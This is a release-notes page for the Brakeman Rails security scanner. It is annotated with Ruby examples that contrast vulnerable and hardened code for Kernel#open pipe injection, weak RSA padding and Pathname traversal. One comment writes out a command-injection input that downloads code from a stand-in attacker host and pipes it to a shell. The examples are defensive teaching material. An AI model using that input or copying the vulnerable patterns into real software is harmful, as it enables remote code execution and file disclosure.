
Releases: presidentbeef/brakeman

6.1.2

02 Feb 06:39
  • Avoid detecting Phlex components as dynamic render paths (Máximo Mussini)
  • Avoid detecting ViewComponentContrib::Base as dynamic render paths (vividmuimui)
  • Avoid copying Sexps that are too large (#1818, #1546)
  • Add EOL date for Ruby 3.3.0
  • Remove deprecated use of Kernel#open("|...")
  • Remove safe_yaml gem dependency
  • Update Highline to 3.0 (#1812)
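The last-but-two item above is worth seeing in code: Kernel#open treats a leading "|" in its argument as "run this as a shell command", so any call that passes a user-influenced name to open() is a command injection, which is why Ruby deprecated the form and Brakeman removed its own use of it. The following is an added example, not Brakeman's code; the function names unsafe_read, safe_read and classify_open are assumptions made up for this illustration.

```ruby
require "tempfile"

# Vulnerable pattern: Kernel#open spawns a shell when the name starts with "|",
# so a name such as "|curl attacker/x | sh" executes instead of being read.
# Kept here for comparison only; it is never called below.
def unsafe_read(name)
  open(name, &:read)
end

# Hardened pattern: File.open never spawns a process. A name beginning with
# "|" is just a filename that (almost certainly) does not exist.
def safe_read(name)
  File.open(name, "r", &:read)
end

# Explicit triage of a user-supplied name. Rejecting pipe syntax up front
# keeps the intent visible in logs instead of relying on a missing-file error.
def classify_open(name)
  return :rejected if name.start_with?("|")
  File.file?(name) ? :file : :missing
end

if __FILE__ == $PROGRAM_NAME
  # Constructed input: a temporary file standing in for an upload or config file.
  Tempfile.create("brakeman-demo") do |f|
    f.write("hello")
    f.flush
    puts safe_read(f.path)        # prints the file contents
    puts classify_open("|id")     # rejected
    begin
      safe_read("|id")
    rescue Errno::ENOENT => e
      puts "File.open refused pipe syntax: #{e.message}"
    end
  end
end
```

When a program genuinely needs to run a command, IO.popen with an argument array (no shell) is the replacement; File.open and File.read are the replacements when a file was intended.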

6.1.1

24 Dec 07:52
  • Handle racc as a default gem in Ruby 3.3.0

6.1.0

05 Dec 07:06
  • Add check for unfiltered search with Ransack
  • Add --timing to add timing duration for scan steps
  • Add PG::Connection.escape_string as a SQL sanitization method (Joévin Soulenq)
  • Handle class << self
  • Fix class method lookup in parent classes
  • Fix keyword splats in filter arguments

6.0.0.1 - Docker only

25 May 16:11
6af53c6

This release is to fix the Ruby version used in the Docker image.

No other changes.

6.0.0

25 May 16:09
  • Drop support for Ruby 1.8/1.9 syntax
  • Raise minimum Ruby version to 3.0
  • Add obsolete fingerprints to comparison report (#1758)
  • Warn about missing CSRF protection when defaults are not loaded (Chris Kruger)
  • Fix false positive with content_tag in newer Rails (#1778)
  • Scan directories that include the word public
  • Fix end-of-life dates for Ruby

5.4.1

21 Feb 17:33
  • Add Rails 6.1 and 7.0 default configuration values
  • Support Rails 7 redirect options
  • Add redirect_back and redirect_back_or_to to open redirect check
  • Revise checking for request.env to only consider request headers
  • Prevent redirects using url_from being marked as unsafe (Lachlan Sylvester)
  • Warn about unscoped find for find_by(id: ...)
  • Support presence, presence_in and in? (#1569)
  • Fix issue with if expressions in when clauses (#1743)
  • Fix file/line location for EOL software warnings

5.4.0

18 Nov 06:34
  • Add check for weak RSA key sizes and padding modes (#1736)
  • Add check for absolute paths issue with Pathname (#1721)
  • Handle multiple values and splats in case/when (#1730)
  • Ignore more model methods in redirects (#1723)
  • Fix load_rails_defaults overwriting settings in the Rails application (James Gregory-Monk)
  • Use relative paths for CodeClimate report format (Mike Poage)
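The weak-RSA item above flags two things: a modulus under 2048 bits and PKCS#1 v1.5 padding. The following added example (not Brakeman's code; the names rsa_key_strong?, audit_rsa, weak_encrypt, oaep_encrypt and oaep_decrypt are assumptions for this illustration) shows the flagged form beside the hardened one, using only Ruby's standard openssl library, and a small audit function that reports the same two findings.

```ruby
require "openssl"

MIN_RSA_BITS = 2048

# True when the modulus is at least 2048 bits; smaller keys are flagged.
def rsa_key_strong?(key)
  key.n.num_bits >= MIN_RSA_BITS
end

# Flagged form: PKCS#1 v1.5 padding, exposed to Bleichenbacher-style
# padding-oracle attacks when the decrypting side leaks padding errors.
def weak_encrypt(key, plaintext)
  key.public_encrypt(plaintext, OpenSSL::PKey::RSA::PKCS1_PADDING)
end

# Hardened form: OAEP padding, to be paired with a key of MIN_RSA_BITS or more.
def oaep_encrypt(key, plaintext)
  key.public_encrypt(plaintext, OpenSSL::PKey::RSA::PKCS1_OAEP_PADDING)
end

def oaep_decrypt(key, ciphertext)
  key.private_decrypt(ciphertext, OpenSSL::PKey::RSA::PKCS1_OAEP_PADDING)
end

# Reports findings in the spirit of a static check: an empty array is clean.
def audit_rsa(key, padding)
  findings = []
  findings << "RSA modulus is #{key.n.num_bits} bits, below #{MIN_RSA_BITS}" unless rsa_key_strong?(key)
  findings << "PKCS#1 v1.5 padding in use; prefer OAEP" if padding == OpenSSL::PKey::RSA::PKCS1_PADDING
  findings
end

if __FILE__ == $PROGRAM_NAME
  weak = OpenSSL::PKey::RSA.new(1024)    # constructed weak key
  strong = OpenSSL::PKey::RSA.new(2048)  # constructed acceptable key
  puts audit_rsa(weak, OpenSSL::PKey::RSA::PKCS1_PADDING)        # two findings
  puts audit_rsa(strong, OpenSSL::PKey::RSA::PKCS1_OAEP_PADDING).inspect  # []
  puts oaep_decrypt(strong, oaep_encrypt(strong, "secret"))      # secret
end
```

audit_rsa inspects a key object; the static check works on source text instead, so it fires on literals such as OpenSSL::PKey::RSA.new(1024) and on the padding constant at the call site, which is why both forms are shown here.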
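The Pathname item above refers to a path-traversal footgun: Pathname#join (like File.expand_path and File.join) discards the base directory when the joined argument is absolute, and it also resolves "..", so user-controlled names can escape a supposedly fixed root. This added example (not Brakeman's code; UPLOAD_ROOT, unsafe_upload_path and safe_upload_path are assumed names for the illustration) shows the escape and a containment check.

```ruby
require "pathname"

# Constructed root directory; nothing below touches the filesystem.
UPLOAD_ROOT = Pathname.new("/srv/app/uploads")

# Vulnerable: an absolute name replaces the root entirely, and ".."
# components walk out of it.
def unsafe_upload_path(name)
  UPLOAD_ROOT.join(name).to_s
end

# Hardened: normalise lexically, then require the result to stay under
# the root. Returns nil for anything that escapes.
# Note: cleanpath does not follow symlinks; if the root may contain
# symlinks pointing outside it, apply the same test to Pathname#realpath.
def safe_upload_path(name)
  root = UPLOAD_ROOT.cleanpath
  candidate = UPLOAD_ROOT.join(name).cleanpath
  return nil unless candidate.to_s.start_with?(root.to_s + "/")
  candidate.to_s
end

if __FILE__ == $PROGRAM_NAME
  ["2024/report.pdf", "/etc/passwd", "../../etc/passwd", "sub/../ok.txt"].each do |name|
    puts "#{name.inspect}: unsafe=#{unsafe_upload_path(name)} safe=#{safe_upload_path(name).inspect}"
  end
end
```

The prefix test must include the trailing separator: comparing against "/srv/app/uploads" alone would accept "/srv/app/uploads-old/secret".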

5.3.1

14 Nov 22:08

5.3.0

10 Aug 00:53
  • Add CWE information to warnings (Stephen Aghaulor)
  • Include explicit engine or lib paths in vendor/ (Joe Rafaniello)
  • Add check for CVE-2022-32209
  • Load rexml as a Brakeman dependency
  • Fix "full call" information propagating unnecessarily

5.2.3

20 Jun 04:08
  • Fix error with hash shorthand syntax (#1700)
  • Match order of interactive options with help message (@roryokane)